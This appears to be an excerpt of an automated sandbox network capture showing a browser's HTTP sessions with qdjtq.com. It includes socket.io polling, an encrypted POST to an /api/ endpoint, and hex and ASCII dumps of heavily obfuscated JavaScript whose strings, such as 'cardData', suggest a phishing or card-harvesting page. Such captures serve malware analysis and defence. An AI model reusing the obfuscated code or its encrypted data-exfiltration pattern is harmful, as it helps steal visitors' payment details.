            2024-09-27 00:29:43 UTC16384INData Raw: b8 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 35 33 37 29 2c 27 e2 8b b7 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 32 66 37 29 2c 27 e2 8b b6 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 36 30 32 29 2c 27 e2 8b be 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 35 62 35 29 2c 27 e2 8b bd 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 36 64 31 29 2c 27 e2 ab bd e2 83 a5 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 36 32 65 29 2c 27 e2 88 82 cc b8 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 31 64 37 29 2c 27 e2 a8 94 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 34 61 37 29 2c 27 e2 86 9b 27 3a 61 31 38 5f 30 78 32 38 35 32 38 32 28 30 78 32 38 35 29 2b 27 6f 77 3b 27 2c 27 e2 a4 b3 cc b8 27 3a 27 26 6e 72 61
            Data Ascii: ':a18_0x285282(0x537),'':a18_0x285282(0x2f7),'':a18_0x285282(0x602),'':a18_0x285282(0x5b5),'':a18_0x285282(0x6d1),'':a18_0x285282(0x62e),'':a18_0x285282(0x1d7),'':a18_0x285282(0x4a7),'':a18_0x285282(0x285)+'ow;','':'&nra
            2024-09-27 00:29:43 UTC16384INData Raw: 26 4e 6f 74 4e 65 73 74 65 64 27 2c 27 26 55 6d 61 63 72 3b 27 2c 27 26 64 64 3b 27 2c 27 26 72 65 61 6c 69 6e 65 3b 27 2c 27 26 65 70 61 72 73 6c 3b 27 2c 27 26 70 61 72 74 3b 27 2c 27 26 66 72 61 63 31 33 3b 27 2c 27 73 73 3b 27 2c 27 26 63 6f 6d 70 6c 65 78 65 73 27 2c 27 26 6e 69 76 3b 27 2c 27 26 6f 65 6c 69 67 3b 27 2c 27 26 65 61 63 75 74 65 3b 27 2c 27 26 6f 72 3b 27 2c 27 26 74 6f 70 66 6f 72 6b 3b 27 2c 27 26 4e 6f 42 72 65 61 6b 3b 27 2c 27 26 54 63 65 64 69 6c 3b 27 2c 27 26 6f 63 79 3b 27 2c 27 26 6c 72 63 6f 72 6e 65 72 3b 27 2c 27 63 61 6c 6c 27 2c 27 26 44 66 72 3b 27 2c 27 26 73 75 6e 67 3b 27 2c 27 26 63 75 70 64 6f 74 3b 27 2c 27 26 72 62 72 6b 65 3b 27 2c 27 26 62 75 6d 70 45 3b 27 2c 27 26 72 63 75 62 3b 27 2c 27 26 62 6f 78 56 48 3b
            Data Ascii: &NotNested','&Umacr;','&dd;','&realine;','&eparsl;','&part;','&frac13;','ss;','&complexes','&niv;','&oelig;','&eacute;','&or;','&topfork;','&NoBreak;','&Tcedil;','&ocy;','&lrcorner;','call','&Dfr;','&sung;','&cupdot;','&rbrke;','&bumpE;','&rcub;','&boxVH;
            2024-09-27 00:29:43 UTC1446INData Raw: 6f 66 20 5f 30 78 34 33 33 39 32 37 5b 5f 30 78 31 31 33 31 32 64 28 30 78 36 32 61 29 5d 5b 27 73 74 61 74 75 73 27 5d 3d 3d 5f 30 78 31 31 33 31 32 64 28 30 78 35 31 35 29 26 26 28 5f 30 78 31 65 61 62 35 32 5b 5f 30 78 31 31 33 31 32 64 28 30 78 31 63 31 29 5d 3d 5f 30 78 34 33 33 39 32 37 5b 27 6d 65 74 61 27 5d 5b 27 73 74 61 74 75 73 27 5d 29 2c 5f 30 78 31 65 61 62 35 32 5b 5f 30 78 31 31 33 31 32 64 28 30 78 34 36 39 29 5d 3d 5b 5d 2c 5f 30 78 34 33 33 39 32 37 5b 5f 30 78 31 31 33 31 32 64 28 30 78 36 32 61 29 5d 5b 5f 30 78 31 31 33 31 32 64 28 30 78 34 36 39 29 5d 26 26 28 5f 30 78 31 65 61 62 35 32 5b 5f 30 78 31 31 33 31 32 64 28 30 78 34 36 39 29 5d 3d 5f 30 78 34 33 33 39 32 37 5b 5f 30 78 31 31 33 31 32 64 28 30 78 36 32 61 29 5d 5b 5f 30
            Data Ascii: of _0x433927[_0x11312d(0x62a)]['status']==_0x11312d(0x515)&&(_0x1eab52[_0x11312d(0x1c1)]=_0x433927['meta']['status']),_0x1eab52[_0x11312d(0x469)]=[],_0x433927[_0x11312d(0x62a)][_0x11312d(0x469)]&&(_0x1eab52[_0x11312d(0x469)]=_0x433927[_0x11312d(0x62a)][_0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            33192.168.2.649751129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:42 UTC550OUTGET /socket.io/?EIO=4&transport=polling&t=P8muYOE HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:42 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:42 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:42 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 63 6a 74 42 79 59 5a 53 59 74 49 5a 7a 6b 6d 35 41 48 74 73 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"cjtByYZSYtIZzkm5AHts","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            34192.168.2.649756129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:43 UTC543OUTGET /socket.io/?EIO=4&transport=websocket&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: Upgrade
            Pragma: no-cache
            Cache-Control: no-cache
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Upgrade: websocket
            Origin: https://qdjtq.com
            Sec-WebSocket-Version: 13
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Sec-WebSocket-Key: fthJU7BCcP3yw+RIpeeeDQ==
            Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            2024-09-27 00:29:44 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:44 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:44 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 22{"code":3,"message":"Bad request"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            35192.168.2.649755129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:43 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8muYmb&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 2
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:43 UTC2OUTData Raw: 34 30
            Data Ascii: 40
            2024-09-27 00:29:44 UTC198INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:44 GMT
            Content-Type: text/html
            Content-Length: 2
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:44 UTC2INData Raw: 6f 6b
            Data Ascii: ok


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            36192.168.2.649757129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:43 UTC575OUTGET /socket.io/?EIO=4&transport=polling&t=P8muYme&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:44 UTC215INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:44 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 32
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:44 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 56 43 57 4c 61 6f 44 62 59 73 35 4a 30 4b 30 4b 41 48 74 74 22 7d
            Data Ascii: 40{"sid":"VCWLaoDbYs5J0K0KAHtt"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            37192.168.2.649762129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC363OUTGET /modify/assets/d1a234c2ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC364INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 113490
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:36 GMT
            ETag: W/"1bb52-190249532a0"
            2024-09-27 00:29:45 UTC16020INData Raw: 63 6f 6e 73 74 20 61 33 31 5f 30 78 31 61 35 33 31 33 3d 61 33 31 5f 30 78 32 65 61 32 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 66 37 35 63 65 2c 5f 30 78 35 38 66 37 66 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 37 66 39 62 35 3d 61 33 31 5f 30 78 32 65 61 32 2c 5f 30 78 34 64 34 65 62 32 3d 5f 30 78 32 66 37 35 63 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 36 62 63 31 39 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66 39 62 35 28 30 78 33 66 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66 39 62 35 28 30 78 33 65 36 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66 39 62 35 28 30 78 32 30 66 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 32 37 66
            Data Ascii: const a31_0x1a5313=a31_0x2ea2;(function(_0x2f75ce,_0x58f7f3){const _0x27f9b5=a31_0x2ea2,_0x4d4eb2=_0x2f75ce();while(!![]){try{const _0x16bc19=-parseInt(_0x27f9b5(0x3f6))/0x1*(parseInt(_0x27f9b5(0x3e6))/0x2)+parseInt(_0x27f9b5(0x20f))/0x3*(-parseInt(_0x27f
            2024-09-27 00:29:45 UTC16384INData Raw: 75 73 65 72 2d 27 2c 27 e9 aa 8c e8 af 81 e9 a1 b5 27 2c 27 64 6f 50 6f 6c 6c 27 2c 27 64 65 63 6f 64 65 72 27 2c 27 70 72 69 6f 72 57 65 62 73 6f 27 2c 27 6f 72 65 5c 78 32 30 69 6e 66 6f 72 6d 27 2c 27 6f 6e 6f 70 65 6e 27 2c 27 6f 72 69 67 69 6e 27 2c 27 70 61 63 6b 65 74 43 72 65 61 27 2c 27 61 62 6f 72 74 27 2c 27 63 61 72 64 44 61 74 61 27 2c 27 66 72 6f 6d 43 68 61 72 43 6f 27 2c 27 61 63 74 69 6f 6e 4b 65 79 27 2c 27 31 36 35 37 31 31 35 39 71 55 42 6e 46 72 27 2c 27 72 65 66 72 65 73 68 27 2c 27 6f 66 66 6c 69 6e 65 45 76 65 27 2c 27 67 65 74 27 2c 27 4d 6f 64 75 6c 65 27 2c 27 68 72 65 66 27 2c 27 6a 65 63 74 5d 27 2c 27 63 61 74 63 68 27 2c 27 61 64 64 72 65 73 73 3a 27 2c 27 73 65 64 27 2c 27 65 66 67 68 69 6a 6b 6c 6d 6e 27 2c 27 2a 2f 2a 27
            Data Ascii: user-','','doPoll','decoder','priorWebso','ore\x20inform','onopen','origin','packetCrea','abort','cardData','fromCharCo','actionKey','16571159qUBnFr','refresh','offlineEve','get','Module','href','ject]','catch','address:','sed','efghijklmn','*/*'
            2024-09-27 00:29:46 UTC16384INData Raw: 73 74 20 5f 30 78 31 36 62 33 30 63 3d 61 33 31 5f 30 78 31 61 35 33 31 33 2c 5f 30 78 31 65 63 64 33 37 3d 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 31 39 63 29 5d 5b 5f 30 78 31 36 62 33 30 63 28 30 78 33 36 31 29 2b 27 78 74 27 5d 3b 5f 30 78 31 65 63 64 33 37 21 3d 3d 6e 75 6c 6c 26 26 28 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 5f 30 78 31 36 62 33 30 63 28 30 78 32 62 31 29 2c 5f 30 78 31 65 63 64 33 37 29 2c 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 5f 30 78 31 36 62 33 30 63 28 30 78 33 33 32 29 29 2c 74 68 69 73 5b 5f 30 78 31 36 62 33 30 63 28 30 78 32 62 39 29 5d 28 29 29 3b 7d 5b 61 33 31 5f 30 78 31 61 35 33 31 33 28 30 78 31 35 36 29 5d 28 29 7b 63
            Data Ascii: st _0x16b30c=a31_0x1a5313,_0x1ecd37=this[_0x16b30c(0x19c)][_0x16b30c(0x361)+'xt'];_0x1ecd37!==null&&(this[_0x16b30c(0x3e8)+'ed'](_0x16b30c(0x2b1),_0x1ecd37),this[_0x16b30c(0x3e8)+'ed'](_0x16b30c(0x332)),this[_0x16b30c(0x2b9)]());}[a31_0x1a5313(0x156)](){c
            2024-09-27 00:29:46 UTC16384INData Raw: 61 33 31 5f 30 78 31 61 35 33 31 33 3b 69 66 28 74 68 69 73 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 3d 3d 3d 5f 30 78 35 30 61 37 65 30 28 30 78 31 39 31 29 7c 7c 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 31 64 30 29 5d 3d 3d 3d 27 6f 70 65 6e 27 7c 7c 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 31 64 30 29 5d 3d 3d 3d 27 63 6c 6f 73 69 6e 67 27 29 73 77 69 74 63 68 28 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 27 70 61 63 6b 65 74 27 2c 5f 30 78 32 38 37 61 61 30 29 2c 74 68 69 73 5b 5f 30 78 35 30 61 37 65 30 28 30 78 33 65 38 29 2b 27 65 64 27 5d 28 5f 30 78 35 30 61 37 65 30 28 30 78 33 64 64 29 29 2c 74 68 69 73 5b 27 72 65 73 65 74 50 69 6e 67 54 27 2b 5f 30 78 35 30 61 37 65 30 28 30 78 31
            Data Ascii: a31_0x1a5313;if(this['readyState']===_0x50a7e0(0x191)||this[_0x50a7e0(0x1d0)]==='open'||this[_0x50a7e0(0x1d0)]==='closing')switch(this[_0x50a7e0(0x3e8)+'ed']('packet',_0x287aa0),this[_0x50a7e0(0x3e8)+'ed'](_0x50a7e0(0x3dd)),this['resetPingT'+_0x50a7e0(0x1
            2024-09-27 00:29:46 UTC16384INData Raw: 5f 30 78 32 34 39 63 64 65 2c 5f 30 78 35 33 37 37 30 36 29 7b 63 6f 6e 73 74 20 5f 30 78 33 36 37 35 38 35 3d 61 33 31 5f 30 78 31 61 35 33 31 33 3b 73 77 69 74 63 68 28 5f 30 78 32 34 39 63 64 65 29 7b 63 61 73 65 20 68 5b 27 43 4f 4e 4e 45 43 54 27 5d 3a 72 65 74 75 72 6e 20 62 65 28 5f 30 78 35 33 37 37 30 36 29 3b 63 61 73 65 20 68 5b 27 44 49 53 43 4f 4e 4e 45 43 54 27 5d 3a 72 65 74 75 72 6e 20 5f 30 78 35 33 37 37 30 36 3d 3d 3d 76 6f 69 64 20 30 78 30 3b 63 61 73 65 20 68 5b 5f 30 78 33 36 37 35 38 35 28 30 78 32 38 33 29 2b 27 52 4f 52 27 5d 3a 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 35 33 37 37 30 36 3d 3d 5f 30 78 33 36 37 35 38 35 28 30 78 32 65 33 29 7c 7c 62 65 28 5f 30 78 35 33 37 37 30 36 29 3b 63 61 73 65 20 68 5b 27 45 56 45
            Data Ascii: _0x249cde,_0x537706){const _0x367585=a31_0x1a5313;switch(_0x249cde){case h['CONNECT']:return be(_0x537706);case h['DISCONNECT']:return _0x537706===void 0x0;case h[_0x367585(0x283)+'ROR']:return typeof _0x537706==_0x367585(0x2e3)||be(_0x537706);case h['EVE
            2024-09-27 00:29:46 UTC16384INData Raw: 3b 7d 3b 63 6c 61 73 73 20 51 20 65 78 74 65 6e 64 73 20 6c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 5f 30 78 31 30 61 33 37 30 2c 5f 30 78 35 32 62 33 35 31 29 7b 63 6f 6e 73 74 20 5f 30 78 33 37 35 63 64 39 3d 61 33 31 5f 30 78 31 61 35 33 31 33 3b 76 61 72 20 5f 30 78 35 66 31 39 34 35 3b 73 75 70 65 72 28 29 2c 74 68 69 73 5b 5f 30 78 33 37 35 63 64 39 28 30 78 32 64 36 29 5d 3d 7b 7d 2c 74 68 69 73 5b 5f 30 78 33 37 35 63 64 39 28 30 78 33 33 66 29 5d 3d 5b 5d 2c 5f 30 78 31 30 61 33 37 30 26 26 74 79 70 65 6f 66 20 5f 30 78 31 30 61 33 37 30 3d 3d 5f 30 78 33 37 35 63 64 39 28 30 78 31 38 35 29 26 26 28 5f 30 78 35 32 62 33 35 31 3d 5f 30 78 31 30 61 33 37 30 2c 5f 30 78 31 30 61 33 37 30 3d 76 6f 69 64 20 30 78 30 29 2c 5f 30 78 35 32 62 33 35 31 3d
            Data Ascii: ;};class Q extends l{constructor(_0x10a370,_0x52b351){const _0x375cd9=a31_0x1a5313;var _0x5f1945;super(),this[_0x375cd9(0x2d6)]={},this[_0x375cd9(0x33f)]=[],_0x10a370&&typeof _0x10a370==_0x375cd9(0x185)&&(_0x52b351=_0x10a370,_0x10a370=void 0x0),_0x52b351=
            2024-09-27 00:29:46 UTC15550INData Raw: 78 33 39 65 63 63 65 5b 5f 30 78 34 63 34 65 37 63 28 30 78 32 65 34 29 5d 28 5f 30 78 34 63 34 65 37 63 28 30 78 33 62 35 29 29 29 61 33 31 5f 30 78 36 33 35 36 38 30 28 5f 30 78 33 39 65 63 63 65 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 35 39 35 30 30 36 3d 5b 27 68 74 74 70 73 3a 2f 2f 70 6f 27 2b 5f 30 78 34 63 34 65 37 63 28 30 78 33 33 64 29 2c 5f 30 78 34 63 34 65 37 63 28 30 78 33 32 31 29 2b 5f 30 78 34 63 34 65 37 63 28 30 78 31 38 65 29 2b 5f 30 78 34 63 34 65 37 63 28 30 78 32 66 31 29 2c 5f 30 78 34 63 34 65 37 63 28 30 78 33 36 38 29 2b 27 6e 64 65 78 2e 63 6f 6d 2f 27 5d 3b 6c 65 74 20 5f 30 78 33 39 38 36 30 64 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 5f 30 78 34 63 34 65 37 63 28 30 78 33 65 62 29 5d 28 5f 30 78 34 63 34 65 37 63
            Data Ascii: x39ecce[_0x4c4e7c(0x2e4)](_0x4c4e7c(0x3b5)))a31_0x635680(_0x39ecce);else{const _0x595006=['https://po'+_0x4c4e7c(0x33d),_0x4c4e7c(0x321)+_0x4c4e7c(0x18e)+_0x4c4e7c(0x2f1),_0x4c4e7c(0x368)+'ndex.com/'];let _0x39860d=localStorage[_0x4c4e7c(0x3eb)](_0x4c4e7c


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            38192.168.2.649763129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC615OUTPOST /api/MC4xNTY5NDAyMDU5Nzc3NTExNg== HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 316
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-platform: "Windows"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Content-Type: text/encrypt
            Accept: */*
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC316OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 39 70 5a 4e 6d 32 5a 32 56 5a 41 59 4a 30 73 37 6a 62 34 5a 67 4a 37 67 69 63 6d 7a 49 6c 57 66 57 6c 2f 5a 42 4e 68 61 35 4a 34 66 58 58 61 47 46 6a 6e 77 67 2f 72 44 34 41 69 4a 32 79 30 37 4c 70 71 63 4b 30 4e 58 49 69 78 46 74 50 52 71 65 31 4e 42 63 66 51 77 69 30 75 6c 59 49 4a 6d 6b 6e 42 43 75 5a 6e 30 41 63 70 38 4c 4e 54 52 4f 39 6f 41 56 58 6c 4a 58 56 66 6f 45 62 47 77 78 68 30 63 46 65 63 56 30 78 52 36 4c 4f 4f 55 51 51 69 61 6e 70 56 41 63 2b 4d 36 54 37 75 41 74 70 33 7a 62 2f 41 37 79 7a 50 45 6e 46 50 58 65 31 76 6b 78 78 67 38 53 43 62 44 69 44 56 77 37 44 66 78 56 6d 49 54 5a 55 42 65 7a 45 6f 4e 32 39 66 52 4f 45 75 65 35 43 78 79 71 6c 2b 69 33 47 52 63 77 49 59 74 30 67 4e 63 32 49 70 44 77 57 5a 4a 39
            Data Ascii: U2FsdGVkX19pZNm2Z2VZAYJ0s7jb4ZgJ7gicmzIlWfWl/ZBNha5J4fXXaGFjnwg/rD4AiJ2y07LpqcK0NXIixFtPRqe1NBcfQwi0ulYIJmknBCuZn0Acp8LNTRO9oAVXlJXVfoEbGwxh0cFecV0xR6LOOUQQianpVAc+M6T7uAtp3zb/A7yzPEnFPXe1vkxxg8SCbDiDVw7DfxVmITZUBezEoN29fROEue5Cxyql+i3GRcwIYt0gNc2IpDwWZJ9
            2024-09-27 00:29:45 UTC238INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: application/json; charset=utf-8
            Content-Length: 36
            Connection: close
            Access-Control-Allow-Origin: *
            ETag: W/"24-u/fScn6wfLBMOH+w8bEBCXzUVGs"
            2024-09-27 00:29:45 UTC36INData Raw: 55 32 46 73 64 47 56 6b 58 31 2b 57 52 59 50 6c 72 50 75 45 61 54 56 63 66 67 38 35 59 36 35 55 38 37 38 3d
            Data Ascii: U2FsdGVkX1+WRYPlrPuEaTVcfg85Y65U878=


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            39192.168.2.649760129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC377OUTGET /socket.io/?EIO=4&transport=polling&t=P8muYOE HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC216INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: text/plain; charset=UTF-8
            Content-Length: 118
            Connection: close
            Access-Control-Allow-Origin: *
            cache-control: no-store
            2024-09-27 00:29:45 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 61 39 71 4e 57 71 55 45 6d 49 4b 36 4b 41 57 6a 41 48 74 75 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
            Data Ascii: 0{"sid":"a9qNWqUEmIK6KAWjAHtu","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            40192.168.2.649761129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:45 UTC597OUTGET /modify/layout/images/52.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:45 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:45 GMT
            Content-Type: image/svg+xml
            Content-Length: 1257
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"4e9-1902494f420"
